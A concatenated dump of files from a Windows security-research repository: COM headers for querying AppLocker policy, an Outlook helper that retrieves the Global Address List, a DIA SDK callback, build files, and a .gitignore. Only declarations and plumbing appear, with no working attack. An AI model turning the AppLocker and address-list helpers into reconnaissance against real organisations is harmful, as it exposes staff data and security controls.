41 | _Out_ LPBSTR pbstrXmlPolicy
42 | );
43 |
44 | virtual BSTR STDMETHODCALLTYPE GetEffectivePolicy(
45 | _Out_ LPBSTR pbstrXmlPolicy
46 | );
47 |
48 | virtual INT STDMETHODCALLTYPE IsFileAllowed(
49 | _In_ BSTR bstrXmlPolicy,
50 | _In_ BSTR bstrFilePath,
51 | _In_ BSTR bstrUserSid,
52 | _Out_ LPGUID pguidResponsibleRuleId,
53 | _Out_ PLONG pbStatus
54 | );
55 |
56 | virtual INT STDMETHODCALLTYPE IsPackageAllowed(
57 | _In_ BSTR bstrXmlPolicy,
58 | _In_ BSTR bstrPublisherName,
59 | _In_ BSTR bstrPackageName,
60 | _In_ ULONG ullPackageVersion,
61 | _In_ BSTR bstrUserSid,
62 | _Out_ LPGUID pguidResponsibleRuleId,
63 | _Out_ PLONG pbStatus
64 | );
65 | };
66 |
67 | #else
68 | typedef struct AppIdPolicyHandlerVtbl {
69 | BEGIN_INTERFACE
70 |
71 | /**
72 | * @brief QueryInterface method from IUnknown
73 | */
74 | HRESULT(STDMETHODCALLTYPE* QueryInterface) (
75 | _In_ IAppIdPolicyHandler* This,
76 | _In_ REFIID riid,
77 | _Out_ PVOID* ppvObject
78 | );
79 |
80 | /**
81 | * @brief AddRef from IUnknown
82 | */
83 | ULONG(STDMETHODCALLTYPE* AddRef)(
84 | _In_ IAppIdPolicyHandler* This
85 | );
86 |
87 | /**
88 | * @brief Release from IUnknown
89 | */
90 | ULONG(STDMETHODCALLTYPE* Release)(
91 | _In_ IAppIdPolicyHandler* This
92 | );
93 |
94 | /**
95 | * @brief GetTypeInfoCount from IDispatch
96 | */
97 | HRESULT(STDMETHODCALLTYPE* GetTypeInfoCount)(
98 | _In_ IAppIdPolicyHandler* This,
99 | _Out_ PUINT pctinfo
100 | );
101 |
102 | /**
103 | * @brief GetTypeInfo from IDispatch
104 | */
105 | HRESULT(STDMETHODCALLTYPE* GetTypeInfo)(
106 | _In_ IAppIdPolicyHandler* This,
107 | _In_ UINT itinfo,
108 | _In_ ULONG lcid,
109 | _Out_ LPVOID* pptinfo
110 | );
111 |
112 | /**
113 | * @brief GetIDsOfNames from IDispatch
114 | */
115 | HRESULT(STDMETHODCALLTYPE* GetIDsOfNames)(
116 | _In_ IAppIdPolicyHandler* This,
117 | _In_ LPIID riid,
118 | _In_ LPOLESTR* rgszNames,
119 | _In_ UINT cNames,
120 | _In_ LCID lcid,
121 | _Out_ DISPID* rgdispid
122 | );
123 |
124 | /**
125 | * @brief Invoke from IDispatch
126 | */
127 | HRESULT(STDMETHODCALLTYPE* Invoke)(
128 | _In_ IAppIdPolicyHandler* This,
129 | _In_ DISPID dispidMember,
130 | _In_ LPIID riid,
131 | _In_ LCID lcid,
132 | _In_ WORD wFlags,
133 | _In_ DISPPARAMS* pdispparams,
134 | _In_ LPVARIANT pvarResult,
135 | _Out_ LPEXCEPINFO pexcepinfo,
136 | _Out_ PUINT puArgErr
137 | );
138 |
139 | /**
140 | * @brief SetPolicy from IAppIdPolicyHandler
141 | */
142 | HRESULT(STDMETHODCALLTYPE* SetPolicy)(
143 | _In_ IAppIdPolicyHandler* This,
144 | _In_ BSTR bstrLdapPath,
145 | _In_ BSTR bstrXmlPolicy
146 | );
147 |
148 | /**
149 | * @brief GetPolicy from IAppIdPolicyHandler
150 | */
151 | HRESULT(STDMETHODCALLTYPE *GetPolicy)(
152 | _In_ IAppIdPolicyHandler* This,
153 | _In_ BSTR bstrLdapPath,
154 | _Out_ LPBSTR pbstrXmlPolicy
155 | );
156 |
157 | /**
158 | * @brief GetEffectivePolicy from IAppIdPolicyHandler
159 | */
160 | HRESULT(STDMETHODCALLTYPE *GetEffectivePolicy)(
161 | _In_ IAppIdPolicyHandler* This,
162 | _Out_ LPBSTR pbstrXmlPolicies
163 | );
164 |
165 | /**
166 | * @brief IsFileAllowed from IAppIdPolicyHandler
167 | */
168 | HRESULT(STDMETHODCALLTYPE *IsFileAllowed)(
169 | _In_ IAppIdPolicyHandler* This,
170 | _In_ BSTR bstrXmlPolicy,
171 | _In_ BSTR bstrFilePath,
172 | _In_ BSTR bstrUserSid,
173 | _Out_ LPGUID pguidResponsibleRuleId,
174 | _Out_ PLONG pbStatus
175 | );
176 |
177 | /**
178 | * @brief IsPackageAllowed from IAppIdPolicyHandler
179 | */
180 | HRESULT(STDMETHODCALLTYPE *IsPackageAllowed)(
181 | _In_ IAppIdPolicyHandler* This,
182 | _In_ BSTR bstrXmlPolicy,
183 | _In_ BSTR bstrPublisherName,
184 | _In_ BSTR bstrPackageName,
185 | _In_ ULONG ullPackageVersion,
186 | _In_ BSTR bstrUserSid,
187 | _Out_ LPGUID pguidResponsibleRuleId,
188 | _Out_ PLONG pbStatus
189 | );
190 |
191 | END_INTERFACE
192 | } AppIdPolicyHandlerVtbl;
193 |
194 | interface IAppIdPolicyHandler {
195 | CONST_VTBL struct AppIdPolicyHandlerVtbl* lpVtbl;
196 | };
197 | #endif
198 |
199 | #endif // !_INTERFACES_H
200 |
--------------------------------------------------------------------------------
/Office/Outlook/inc/outlook.h:
--------------------------------------------------------------------------------
1 | /**
2 | * @file outlook.h
3 | * @data 10/03/2021
4 | * @author Paul L. (@am0nsec)
5 | * @version 1.0
6 | * @brief Outlook utility class.
7 | * @details
8 | * @link https://github.com/am0nsec/wspe
9 | * @copyright This project has been released under the GNU Public License v3 license.
10 | */
11 |
12 | #ifndef __OUTLOOK_H_GUARD__
13 | #define __OUTLOOK_H_GUARD__
14 |
15 | #include
16 | #include
17 |
18 | /**
19 | * @brief Helps making the code a little bit less bloated.
20 | */
21 | #define EXIT_ON_ERROR(x) \
22 | if(FAILED(x)) {return E_FAIL;}
23 |
24 | /**
25 | * @brief Outlook contact record.
26 | */
27 | typedef struct _OutlookContactRecord {
28 | BSTR Name;
29 | BSTR FirstName;
30 | BSTR LastName;
31 | BSTR PrimarySmtpAddress;
32 | BSTR JobTitle;
33 | BSTR Department;
34 | BSTR OfficeLocation;
35 | BSTR City;
36 | } OutlookContactRecord, * POutlookContactRecord;
37 |
38 | /**
39 | * @brief Different type of AddressEntry
40 | */
41 | typedef enum _OlAddressEntryUserType {
42 | olExchangeUserAddressEntry = 0,
43 | olExchangeDistributionListAddressEntry = 1,
44 | olExchangePublicFolderAddressEntry = 2,
45 | olExchangeAgentAddressEntry = 3,
46 | olExchangeOrganizationAddressEntry = 4,
47 | olExchangeRemoteUserAddressEntry = 5,
48 | olOutlookContactAddressEntry = 10,
49 | olOutlookDistributionListAddressEntry = 11,
50 | olLdapAddressEntry = 20,
51 | olSmtpAddressEntry = 30,
52 | olOtherAddressEntry = 40
53 | } OlAddressEntryUserType;
54 |
55 | /**
56 | * @brief Internal Outlook class.
57 | */
58 | typedef struct OutlookUtil OutlookUtil;
59 |
60 | typedef struct OutlookUtilVtbl OutlookUtilVtbl;
61 |
62 | /**
63 | * @brief Virtual table of the OutlookUtil structure.
64 | */
65 | typedef struct OutlookUtilVtbl {
66 | /**
67 | * @brief Initialises the COM library.
68 | */
69 | HRESULT(STDMETHODCALLTYPE* Initialise)(
70 | _In_ OutlookUtil* pThis
71 | );
72 |
73 | /**
74 | * @brief Uninitialises the COM library. COM and make cleanup the data.
75 | */
76 | HRESULT(STDMETHODCALLTYPE* Uninitialise)(
77 | _In_ OutlookUtil* pThis
78 | );
79 |
80 | /**
81 | * @brief Get the list of addresses.
82 | */
83 | HRESULT(STDMETHODCALLTYPE* GetGlobalAddressList)(
84 | _In_ OutlookUtil* pOutlookUtil,
85 | _Out_ PLONG plCount,
86 | _Out_ OutlookContactRecord** ppContactRecords
87 | );
88 | };
89 |
90 | /**
91 | * @brief C implementation of a class.
92 | */
93 | typedef struct OutlookUtil {
94 | /**
95 | * @brief Virtual table of the OutlookUtil structure.
96 | */
97 | struct OutlookUtilVtbl lpVtbl;
98 |
99 | /**
100 | * @brief Pointer to an _Application dispatch interface.
101 | */
102 | IDispatch* pOutlookApplication;
103 |
104 | /**
105 | * @brief Whether the class has been initialised.
106 | */
107 | BOOLEAN m_bInitialised;
108 | };
109 |
110 | /**
111 | * @brief Create a OutlookUtil C class.
112 | * @param ppOutlookUtil Pointer to a OutlookUtil class.
113 | * @param pHeapHandle Pointer to a RWX Heap handle.
114 | * @return Whether the class has been successfully created.
115 | */
116 | _Success_(return == S_OK) _Must_inspect_result_
117 | HRESULT STDMETHODCALLTYPE OuCreateOutlookUtilClass(
118 | _Inout_ OutlookUtil** ppOutlookUtil,
119 | _Out_ PHANDLE pHeapHandle
120 | );
121 |
122 | /**
123 | * @brief Free a OutlookUtil C class.
124 | * @param ppOutlookUtil Pointer to a OutlookUtil class.
125 | * @param pHeapHandle Pointer to a RWX Heap handle.
126 | * @return Whether the class has been successfully free'ed.
127 | */
128 | _Success_(return == S_OK) _Must_inspect_result_
129 | HRESULT STDMETHODCALLTYPE OuFreeOutlookUtilClass(
130 | _In_ OutlookUtil** ppOutlookUtil,
131 | _In_ PHANDLE pHeapHandle
132 | );
133 |
134 | /**
135 | * @brief Initializes the COM library.
136 | * @param pOutlookUtil Pointer to a OutlookUtil class.
137 | * @return Whether the COM library has been successfully initialised.
138 | */
139 | _Success_(return == S_OK) _Must_inspect_result_
140 | HRESULT STDMETHODCALLTYPE Initialise(
141 | _In_ OutlookUtil* pOutlookUtil
142 | );
143 |
144 | /**
145 | * @brief Uninitialise the COM library and cleanup the data.
146 | * @param pOutlookUtil Pointer to a OutlookUtil class.
147 | * @return Whether the COM library has been successfully uninitialised and the data removed.
148 | */
149 | _Success_(return == S_OK) _Must_inspect_result_
150 | HRESULT STDMETHODCALLTYPE Uninitialise(
151 | _In_ OutlookUtil* pOutlookUtil
152 | );
153 |
154 | /**
155 | * @brief
156 | * @param pOutlookUtil
157 | * @param plCount
158 | * @param ppContactRecords
159 | * @return
160 | */
161 | _Success_(return == S_OK) _Must_inspect_result_
162 | HRESULT STDMETHODCALLTYPE GetGlobalAddressList(
163 | _In_ OutlookUtil* pOutlookUtil,
164 | _Out_ PLONG plCount,
165 | _Out_ OutlookContactRecord** ppContactRecords
166 | );
167 |
168 | /**
169 | * @brief Get a pointer to a Outlook.Application dispatch interface.
170 | * @param ppIDispatch Pointer to a IDispatch interface.
171 | * @return Whether the Outlook.Application dispatch interface has been created.
172 | */
173 | _Success_(return == S_OK) _Must_inspect_result_
174 | HRESULT STDMETHODCALLTYPE OupGetApplicationDispatchInterface(
175 | _Out_ IDispatch** ppIDispatch
176 | );
177 |
178 | /**
179 | * @brief
180 | * @param pInterface
181 | * @param szMethodName
182 | * @param pVariables
183 | * @param dwVaraibles
184 | * @param ppIDispatch
185 | * @param pDispatchId
186 | * @return
187 | */
188 | HRESULT STDMETHODCALLTYPE OupGetDispatchInterface(
189 | _In_ IDispatch* pInterface,
190 | _In_ LPOLESTR szMethodName,
191 | _In_opt_ VARIANT* pVariables,
192 | _In_ DWORD dwVaraibles,
193 | _Out_ IDispatch** ppIDispatch,
194 | _Inout_opt_ DISPID* pDispatchId
195 | );
196 |
197 | /**
198 | * @brief
199 | * @param pInterface
200 | * @param szProperty
201 | * @param dwPropertyType
202 | * @param pDispatchId
203 | * @param pProperty
204 | * @return
205 | */
206 | HRESULT STDMETHODCALLTYPE OupGetDispatchInterfaceProperty(
207 | _In_ IDispatch* pInterface,
208 | _In_ LPOLESTR szProperty,
209 | _In_ DWORD dwPropertyType,
210 | _Inout_opt_ DISPID* pDispatchId,
211 | _Out_ VARIANT* pProperty
212 | );
213 |
214 | #endif // !__OUTLOOK_H_GUARD__
215 |
216 |
--------------------------------------------------------------------------------
/DIA/src/callback.c:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: callback.c
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Abstraction of the Microsoft Debug Interface Access (DIA) SDK.
9 |
10 | In this case this module contains the code for the CCallback COM interface implementation when loading PDB from
11 | a PE EXE file.
12 |
13 | Documentation available at: https://docs.microsoft.com/en-us/visualstudio/debugger/debug-interface-access/debug-interface-access-sdk
14 | Most of the code is based on the Dia2Dump code sample shipped with the MS DIA SDK.
15 | ================================================================================================+*/
16 |
17 | #include
18 | #include
19 |
20 | #include "callback.h"
21 |
22 | // 4688a074-5a4d-4486-aea8-7b90711d9f7c
23 | CONST IID IID_IDiaLoadCallback2 = {
24 | 0x4688a074, 0x5a4d, 0x4486, { 0xae, 0xa8, 0x7b, 0x90, 0x71, 0x1d, 0x9f, 0x7c }
25 | };
26 |
27 | // C32ADB82-73F4-421b-95D5-A4706EDF5DBE
28 | CONST IID IID_IDiaLoadCallback = {
29 | 0xC32ADB82, 0x73F4, 0x421b, { 0x95, 0xD5, 0xA4, 0x70, 0x6E, 0xDF, 0x5D, 0xBE }
30 | };
31 |
32 | // Global handle variable used to allocate/free executable heap memory.
33 | HANDLE g_HeapHandle = INVALID_HANDLE_VALUE;
34 |
35 |
36 | HRESULT STDMETHODCALLTYPE QueryInterface(
37 | IDiaLoadCallback2* This,
38 | REFIID rid,
39 | PVOID* ppUnk
40 | ) {
41 | if (ppUnk == NULL) {
42 | return E_INVALIDARG;
43 | }
44 |
45 | if (IsEqualIID(rid, &IID_IDiaLoadCallback2))
46 | *ppUnk = (IDiaLoadCallback2*)This;
47 | else if (IsEqualIID(rid, &IID_IDiaLoadCallback))
48 | *ppUnk = (IDiaLoadCallback*)This;
49 | else if (IsEqualIID(rid, &IID_IUnknown))
50 | *ppUnk = (IUnknown*)This;
51 | else
52 | *ppUnk = NULL;
53 | if (*ppUnk != NULL) {
54 | This->lpVtbl->AddRef(This);
55 | return S_OK;
56 | }
57 | return E_NOINTERFACE;
58 | }
59 |
60 | ULONG STDMETHODCALLTYPE AddRef(
61 | IDiaLoadCallback2* This
62 | ) {
63 | DiaCallback* Callback = (DiaCallback*)This;
64 | return ++Callback->m_nRefCount;
65 | }
66 |
67 | ULONG STDMETHODCALLTYPE Release(
68 | IDiaLoadCallback2* This
69 | ) {
70 | DiaCallback* Callback = (DiaCallback*)This;
71 |
72 | if ((--Callback->m_nRefCount) == 0) {
73 | DiaCallbackHelper(FALSE, (PVOID)&This);
74 | return 0x00;
75 | }
76 | return Callback->m_nRefCount;
77 | }
78 |
79 | HRESULT STDMETHODCALLTYPE NotifyDebugDir(
80 | IDiaLoadCallback2* This,
81 | BOOL fExecutable,
82 | DWORD cbData,
83 | BYTE data[] // really a const struct _IMAGE_DEBUG_DIRECTORY *
84 | ) {
85 | return S_OK;
86 | }
87 |
88 | HRESULT STDMETHODCALLTYPE NotifyOpenDBG(
89 | IDiaLoadCallback2* This,
90 | LPCOLESTR dbgPath,
91 | HRESULT resultCode
92 | ) {
93 | return S_OK;
94 | }
95 |
96 | HRESULT STDMETHODCALLTYPE NotifyOpenPDB(
97 | IDiaLoadCallback2* This,
98 | LPCOLESTR pdbPath,
99 | HRESULT resultCode
100 | ) {
101 | if (SUCCEEDED(resultCode)) {
102 | wprintf(L"[*] Open: %s\r\n", pdbPath);
103 | }
104 | return S_OK;
105 | }
106 |
107 | HRESULT STDMETHODCALLTYPE RestrictRegistryAccess(
108 | IDiaLoadCallback2* This
109 | ) {
110 | // return hr != S_OK to prevent querying the registry for symbol search paths
111 | return S_OK;
112 | }
113 |
114 | HRESULT STDMETHODCALLTYPE RestrictSymbolServerAccess(
115 | IDiaLoadCallback2* This
116 | ) {
117 | // return hr != S_OK to prevent accessing a symbol server
118 | return S_OK;
119 | }
120 |
121 | HRESULT STDMETHODCALLTYPE RestrictOriginalPathAccess(
122 | IDiaLoadCallback2* This
123 | ) {
124 | // return hr != S_OK to prevent querying the registry for symbol search paths
125 | return S_OK;
126 | }
127 |
128 | HRESULT STDMETHODCALLTYPE RestrictReferencePathAccess(
129 | IDiaLoadCallback2* This
130 | ) {
131 | // return hr != S_OK to prevent accessing a symbol server
132 | return S_OK;
133 | }
134 |
135 | HRESULT STDMETHODCALLTYPE RestrictDBGAccess(
136 | IDiaLoadCallback2* This
137 | ) {
138 | return S_OK;
139 | }
140 |
141 | HRESULT STDMETHODCALLTYPE RestrictSystemRootAccess(
142 | IDiaLoadCallback2* This
143 | ) {
144 | return S_OK;
145 | }
146 |
147 |
148 | static CONST IDiaLoadCallback2Vtbl CallbackVirtualTable = {
149 | // IUnknown
150 | QueryInterface,
151 | AddRef,
152 | Release,
153 |
154 | // IDiaLoadCallback
155 | NotifyDebugDir,
156 | NotifyOpenDBG,
157 | NotifyOpenPDB,
158 | RestrictRegistryAccess,
159 | RestrictSymbolServerAccess,
160 |
161 | // IDiaLoadCallback2
162 | RestrictOriginalPathAccess,
163 | RestrictReferencePathAccess,
164 | RestrictDBGAccess,
165 | RestrictSystemRootAccess
166 | };
167 |
168 | _Use_decl_annotations_
169 | HRESULT STDMETHODCALLTYPE DiaCallbackHelper(
170 | _In_ BOOLEAN Initialise,
171 | _Inout_ PVOID** Callback
172 | ) {
173 | if (Callback == NULL)
174 | return E_FAIL;
175 |
176 | // Create the structure for the callback
177 | if (Initialise) {
178 | if (g_HeapHandle != INVALID_HANDLE_VALUE)
179 | return E_FAIL;
180 |
181 | // Create executable heap
182 | g_HeapHandle = HeapCreate(
183 | HEAP_CREATE_ENABLE_EXECUTE,
184 | sizeof(IDiaLoadCallback2Vtbl) + sizeof(DiaCallback),
185 | 0x1000
186 | );
187 | if (g_HeapHandle == INVALID_HANDLE_VALUE)
188 | return E_FAIL;
189 |
190 | // Allocate memory in the new heap
191 | DiaCallback* Buffer = HeapAlloc(g_HeapHandle, HEAP_ZERO_MEMORY, sizeof(DiaCallback) + sizeof(IDiaLoadCallback2Vtbl));
192 | if (Buffer == NULL) {
193 | HeapDestroy(g_HeapHandle);
194 | return E_FAIL;
195 | }
196 |
197 | PVOID cstruct = HeapAlloc(g_HeapHandle, HEAP_ZERO_MEMORY, sizeof(DiaCallback));;
198 | PVOID vtable = NULL;
199 |
200 |
201 | // Assemble everything
202 | Buffer->m_nRefCount = 0x00;
203 | Buffer->lpVtbl = (IDiaLoadCallback2*)&CallbackVirtualTable;
204 |
205 | *Callback = (PVOID)Buffer;
206 | return S_OK;
207 | }
208 | // Delete the structure for the callback
209 | else {
210 | if (g_HeapHandle == INVALID_HANDLE_VALUE || Callback == NULL)
211 | return E_FAIL;
212 |
213 | // Check that the reference count is zero
214 | DiaCallback* src = (DiaCallback*)*Callback;
215 | if (src->m_nRefCount != 0x00)
216 | return E_FAIL;
217 |
218 | // Free the memory and destroy the executable heap
219 | HeapFree(g_HeapHandle, 0x00, src);
220 | HeapDestroy(g_HeapHandle);
221 | g_HeapHandle = INVALID_HANDLE_VALUE;
222 | }
223 |
224 | return E_FAIL;
225 | }
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # ASP.NET Scaffolding
65 | ScaffoldingReadMe.txt
66 |
67 | # StyleCop
68 | StyleCopReport.xml
69 |
70 | # Files built by Visual Studio
71 | *_i.c
72 | *_p.c
73 | *_h.h
74 | *.ilk
75 | *.meta
76 | *.obj
77 | *.iobj
78 | *.pch
79 | *.pdb
80 | *.ipdb
81 | *.pgc
82 | *.pgd
83 | *.rsp
84 | *.sbr
85 | *.tlb
86 | *.tli
87 | *.tlh
88 | *.tmp
89 | *.tmp_proj
90 | *_wpftmp.csproj
91 | *.log
92 | *.vspscc
93 | *.vssscc
94 | .builds
95 | *.pidb
96 | *.svclog
97 | *.scc
98 |
99 | # Chutzpah Test files
100 | _Chutzpah*
101 |
102 | # Visual C++ cache files
103 | ipch/
104 | *.aps
105 | *.ncb
106 | *.opendb
107 | *.opensdf
108 | *.sdf
109 | *.cachefile
110 | *.VC.db
111 | *.VC.VC.opendb
112 |
113 | # Visual Studio profiler
114 | *.psess
115 | *.vsp
116 | *.vspx
117 | *.sap
118 |
119 | # Visual Studio Trace Files
120 | *.e2e
121 |
122 | # TFS 2012 Local Workspace
123 | $tf/
124 |
125 | # Guidance Automation Toolkit
126 | *.gpState
127 |
128 | # ReSharper is a .NET coding add-in
129 | _ReSharper*/
130 | *.[Rr]e[Ss]harper
131 | *.DotSettings.user
132 |
133 | # TeamCity is a build add-in
134 | _TeamCity*
135 |
136 | # DotCover is a Code Coverage Tool
137 | *.dotCover
138 |
139 | # AxoCover is a Code Coverage Tool
140 | .axoCover/*
141 | !.axoCover/settings.json
142 |
143 | # Coverlet is a free, cross platform Code Coverage Tool
144 | coverage*[.json, .xml, .info]
145 |
146 | # Visual Studio code coverage results
147 | *.coverage
148 | *.coveragexml
149 |
150 | # NCrunch
151 | _NCrunch_*
152 | .*crunch*.local.xml
153 | nCrunchTemp_*
154 |
155 | # MightyMoose
156 | *.mm.*
157 | AutoTest.Net/
158 |
159 | # Web workbench (sass)
160 | .sass-cache/
161 |
162 | # Installshield output folder
163 | [Ee]xpress/
164 |
165 | # DocProject is a documentation generator add-in
166 | DocProject/buildhelp/
167 | DocProject/Help/*.HxT
168 | DocProject/Help/*.HxC
169 | DocProject/Help/*.hhc
170 | DocProject/Help/*.hhk
171 | DocProject/Help/*.hhp
172 | DocProject/Help/Html2
173 | DocProject/Help/html
174 |
175 | # Click-Once directory
176 | publish/
177 |
178 | # Publish Web Output
179 | *.[Pp]ublish.xml
180 | *.azurePubxml
181 | # Note: Comment the next line if you want to checkin your web deploy settings,
182 | # but database connection strings (with potential passwords) will be unencrypted
183 | *.pubxml
184 | *.publishproj
185 |
186 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
187 | # checkin your Azure Web App publish settings, but sensitive information contained
188 | # in these scripts will be unencrypted
189 | PublishScripts/
190 |
191 | # NuGet Packages
192 | *.nupkg
193 | # NuGet Symbol Packages
194 | *.snupkg
195 | # The packages folder can be ignored because of Package Restore
196 | **/[Pp]ackages/*
197 | # except build/, which is used as an MSBuild target.
198 | !**/[Pp]ackages/build/
199 | # Uncomment if necessary however generally it will be regenerated when needed
200 | #!**/[Pp]ackages/repositories.config
201 | # NuGet v3's project.json files produces more ignorable files
202 | *.nuget.props
203 | *.nuget.targets
204 |
205 | # Microsoft Azure Build Output
206 | csx/
207 | *.build.csdef
208 |
209 | # Microsoft Azure Emulator
210 | ecf/
211 | rcf/
212 |
213 | # Windows Store app package directories and files
214 | AppPackages/
215 | BundleArtifacts/
216 | Package.StoreAssociation.xml
217 | _pkginfo.txt
218 | *.appx
219 | *.appxbundle
220 | *.appxupload
221 |
222 | # Visual Studio cache files
223 | # files ending in .cache can be ignored
224 | *.[Cc]ache
225 | # but keep track of directories ending in .cache
226 | !?*.[Cc]ache/
227 |
228 | # Others
229 | ClientBin/
230 | ~$*
231 | *~
232 | *.dbmdl
233 | *.dbproj.schemaview
234 | *.jfm
235 | *.pfx
236 | *.publishsettings
237 | orleans.codegen.cs
238 |
239 | # Including strong name files can present a security risk
240 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
241 | #*.snk
242 |
243 | # Since there are multiple workflows, uncomment next line to ignore bower_components
244 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
245 | #bower_components/
246 |
247 | # RIA/Silverlight projects
248 | Generated_Code/
249 |
250 | # Backup & report files from converting an old project file
251 | # to a newer Visual Studio version. Backup files are not needed,
252 | # because we have git ;-)
253 | _UpgradeReport_Files/
254 | Backup*/
255 | UpgradeLog*.XML
256 | UpgradeLog*.htm
257 | ServiceFabricBackup/
258 | *.rptproj.bak
259 |
260 | # SQL Server files
261 | *.mdf
262 | *.ldf
263 | *.ndf
264 |
265 | # Business Intelligence projects
266 | *.rdl.data
267 | *.bim.layout
268 | *.bim_*.settings
269 | *.rptproj.rsuser
270 | *- [Bb]ackup.rdl
271 | *- [Bb]ackup ([0-9]).rdl
272 | *- [Bb]ackup ([0-9][0-9]).rdl
273 |
274 | # Microsoft Fakes
275 | FakesAssemblies/
276 |
277 | # GhostDoc plugin setting file
278 | *.GhostDoc.xml
279 |
280 | # Node.js Tools for Visual Studio
281 | .ntvs_analysis.dat
282 | node_modules/
283 |
284 | # Visual Studio 6 build log
285 | *.plg
286 |
287 | # Visual Studio 6 workspace options file
288 | *.opt
289 |
290 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
291 | *.vbw
292 |
293 | # Visual Studio LightSwitch build output
294 | **/*.HTMLClient/GeneratedArtifacts
295 | **/*.DesktopClient/GeneratedArtifacts
296 | **/*.DesktopClient/ModelManifest.xml
297 | **/*.Server/GeneratedArtifacts
298 | **/*.Server/ModelManifest.xml
299 | _Pvt_Extensions
300 |
301 | # Paket dependency manager
302 | .paket/paket.exe
303 | paket-files/
304 |
305 | # FAKE - F# Make
306 | .fake/
307 |
308 | # CodeRush personal settings
309 | .cr/personal
310 |
311 | # Python Tools for Visual Studio (PTVS)
312 | __pycache__/
313 | *.pyc
314 |
315 | # Cake - Uncomment if you are using it
316 | # tools/**
317 | # !tools/packages.config
318 |
319 | # Tabs Studio
320 | *.tss
321 |
322 | # Telerik's JustMock configuration file
323 | *.jmconfig
324 |
325 | # BizTalk build output
326 | *.btp.cs
327 | *.btm.cs
328 | *.odx.cs
329 | *.xsd.cs
330 |
331 | # OpenCover UI analysis results
332 | OpenCover/
333 |
334 | # Azure Stream Analytics local run output
335 | ASALocalRun/
336 |
337 | # MSBuild Binary and Structured Log
338 | *.binlog
339 |
340 | # NVidia Nsight GPU debugger configuration file
341 | *.nvuser
342 |
343 | # MFractors (Xamarin productivity tool) working folder
344 | .mfractor/
345 |
346 | # Local History for Visual Studio
347 | .localhistory/
348 |
349 | # BeatPulse healthcheck temp database
350 | healthchecksdb
351 |
352 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
353 | MigrationBackup/
354 |
355 | # Ionide (cross platform F# VS Code tools) working folder
356 | .ionide/
357 |
358 | # CMake
359 | out/
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/AESCrypt.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Custom
6 | Win32
7 |
8 |
9 | Custom
10 | x64
11 |
12 |
13 | Debug
14 | Win32
15 |
16 |
17 | Release
18 | Win32
19 |
20 |
21 | Debug
22 | x64
23 |
24 |
25 | Release
26 | x64
27 |
28 |
29 |
30 | 16.0
31 | {3CB82A71-C96B-475D-B617-25924EB88631}
32 | AESCrypt
33 | 10.0
34 |
35 |
36 |
37 | Application
38 | true
39 | v142
40 | MultiByte
41 |
42 |
43 | Application
44 | false
45 | v142
46 | true
47 | MultiByte
48 |
49 |
50 | Application
51 | true
52 | v142
53 | MultiByte
54 |
55 |
56 | Application
57 | false
58 | v142
59 | true
60 | MultiByte
61 |
62 |
63 | v142
64 |
65 |
66 | v142
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 | C:\Program Files\OpenSSL-Win64\include\;$(IncludePath)
88 | C:\Program Files\OpenSSL-Win64\lib;$(LibraryPath)
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | true
95 | true
96 |
97 |
98 | Console
99 |
100 |
101 |
102 |
103 | Level3
104 | Disabled
105 | true
106 | true
107 |
108 |
109 | Console
110 |
111 |
112 |
113 |
114 | Level3
115 | MaxSpeed
116 | true
117 | true
118 | true
119 | true
120 |
121 |
122 | Console
123 | true
124 | true
125 |
126 |
127 |
128 |
129 | Level3
130 | MaxSpeed
131 | true
132 | true
133 | true
134 | true
135 | %(AdditionalIncludeDirectories)
136 | false
137 | MultiThreaded
138 |
139 |
140 | Console
141 | true
142 | true
143 | %(AdditionalDependencies)
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/DIA/src/interface.c:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: interface.c
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Abstraction of the Microsoft Debug Interface Access (DIA) SDK.
9 |
